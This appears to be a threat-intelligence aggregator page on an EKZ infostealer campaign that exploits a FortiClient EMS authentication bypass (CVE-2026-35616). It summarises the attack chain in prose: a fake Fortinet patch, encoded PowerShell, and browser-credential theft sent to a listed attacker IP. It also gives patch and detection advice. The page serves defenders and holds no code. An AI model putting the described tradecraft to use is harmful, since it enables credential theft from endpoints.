EKZ Infostealer delivered through FortiClient EMS abuse
Malware Activity
Summary
Hide ▲
Show ▼
A new EKZ Infostealer delivery chain is using FortiClient EMS abuse to silently install a credential stealer and siphon browser data from affected endpoints. The malware is being launched through FortiClient-managed VPN scripting workflows after attackers modify EMS configuration and policies. It targets Chromium and Firefox data stores, including saved credentials, cookies, and payment details, which raises account-takeover risk. The payload is also exfiltrating stolen data to an attacker-controlled VPS over HTTP.
Related Happenings
FortiClient EMS CVE-2026-35616 exploitation wave
Exploitation Wave
First: 28.05.2026 18:26
Last: 28.05.2026 18:26
Sources 1
How related:
Hackers are exploiting an authentication bypass vulnerability (CVE-2026-35616) in FortiClient Enterprise Management Server (EMS) to deliver an undocumented credential stealer called EKZ.
About this happening:
**CVE-2026-35616** exploitation in **FortiClient Enterprise Management Server (EMS)** is being used to deliver the undocumented credential stealer **EKZ**. Attackers are abusing u...
FortiClient EMS CVE-2026-35616 exploitation wave
Exploitation WaveHow related: Hackers are exploiting an authentication bypass vulnerability (CVE-2026-35616) in FortiClient Enterprise Management Server (EMS) to deliver an undocumented credential stealer called EKZ.
About this happening: **CVE-2026-35616** exploitation in **FortiClient Enterprise Management Server (EMS)** is being used to deliver the undocumented credential stealer **EKZ**. Attackers are abusing u...
Fortinet FortiClient EMS emergency patch release (CVE-2026-35616, CVE-2026-21643)
Security Patch Release
First: 07.04.2026 12:26
Last: 07.04.2026 12:26
Sources 1
How related:
Fortinet confirmed in early April that it was being exploited and released emergency hotfixes for versions 7.4.5 and 7.4.6 of the product.
About this happening:
**Fortinet FortiClient EMS** is a **security-patch release** happening centered on **CVE-2026-35616** and **CVE-2026-21643**. Fortinet issued an **out-of-band emergency hotfix** a...
Fortinet FortiClient EMS emergency patch release (CVE-2026-35616, CVE-2026-21643)
Security Patch ReleaseHow related: Fortinet confirmed in early April that it was being exploited and released emergency hotfixes for versions 7.4.5 and 7.4.6 of the product.
About this happening: **Fortinet FortiClient EMS** is a **security-patch release** happening centered on **CVE-2026-35616** and **CVE-2026-21643**. Fortinet issued an **out-of-band emergency hotfix** a...
Latest development: 28.05.2026 18:26
Arctic Wolf observed threat actors abusing FortiClient Endpoint Management Server (EMS) and CVE-2026-35616 in May 2026 to modify EMS-managed configuration, disguise FortiEndpoint_Patch.exe as a Fortinet endpoint update, and use fortitray.exe, cmd.exe, and a Base64-encoded PowerShell chain to download malware and exfiltrate browser data to 83.138.53[.]110.
FortiClient EMS improper access control flaw (CVE-2026-35616)
Vulnerability
First: 05.04.2026 21:45
Last: 05.04.2026 21:45
Sources 1
How related:
Hackers are exploiting an authentication bypass vulnerability (CVE-2026-35616) in FortiClient Enterprise Management Server (EMS) to deliver an undocumented credential stealer called EKZ.
About this happening:
**CVE-2026-35616** is an **actively exploited** improper access control flaw in **FortiClient Enterprise Management Server (EMS)** that lets unauthenticated attackers execute code...
FortiClient EMS improper access control flaw (CVE-2026-35616)
VulnerabilityHow related: Hackers are exploiting an authentication bypass vulnerability (CVE-2026-35616) in FortiClient Enterprise Management Server (EMS) to deliver an undocumented credential stealer called EKZ.
About this happening: **CVE-2026-35616** is an **actively exploited** improper access control flaw in **FortiClient Enterprise Management Server (EMS)** that lets unauthenticated attackers execute code...
Latest development: 28.05.2026 18:26
Attackers were already abusing **CVE-2026-35616** against **FortiClient EMS** in **May 2026**. The flaw provided **pre-auth API access bypass** and **privilege escalation** before remediation in **7.4.7 and later**.
Stealit fake game and VPN installer campaign
Campaign
First: 13.10.2025 16:45
Last: 13.10.2025 16:45
Sources 1
About this happening:
The **Stealit** campaign is using **fake game and VPN installers** to infect users and **move its C2 panel**, increasing the risk of credential and wallet theft. The operation mat...
Stealit fake game and VPN installer campaign
CampaignAbout this happening: The **Stealit** campaign is using **fake game and VPN installers** to infect users and **move its C2 panel**, increasing the risk of credential and wallet theft. The operation mat...
Stealit malware activity abusing Node.js SEA and counterfeit installers
Malware Activity
First: 10.10.2025 17:25
Last: 10.10.2025 17:25
Sources 1
About this happening:
**Stealit** is an active malware activity that uses **Node.js Single Executable Application (SEA)** and some **Electron** builds to spread standalone payloads through counterfeit...
Stealit malware activity abusing Node.js SEA and counterfeit installers
Malware ActivityAbout this happening: **Stealit** is an active malware activity that uses **Node.js Single Executable Application (SEA)** and some **Electron** builds to spread standalone payloads through counterfeit...
Timeline
-
28.05.2026 20:25 2 articles · 2h ago
EKZ Infostealer is delivered through FortiClient EMS abuse
Technical Analysis UpdateArctic Wolf observed attackers exploiting CVE-2026-35616 in FortiClient Enterprise Management Server (EMS) to deliver EKZ Infostealer by abusing endpoint APIs, modifying EMS configuration and VPN policies, and launching malicious scripts through FortiClient-managed VPN workflows. The chain disguised the payload as a Fortinet endpoint update or patch, used base64-encoded PowerShell to download and run the credential stealer, and exfiltrated harvested browser data to an attacker-controlled VPS over HTTP. Fortinet said the flaw was being exploited in early April and released emergency hotfixes for versions 7.4.5 and 7.4.6, while defenders were urged to watch for certificate-authentication anomalies and unexpected Remote Access Profile changes.
Show sources
- Hackers exploit FortiClient EMS flaw to push infostealer malware — www.bleepingcomputer.com — 28.05.2026 20:25
- Hackers exploit FortiClient EMS flaw to push infostealer malware — www.bleepingcomputer.com — 28.05.2026 20:25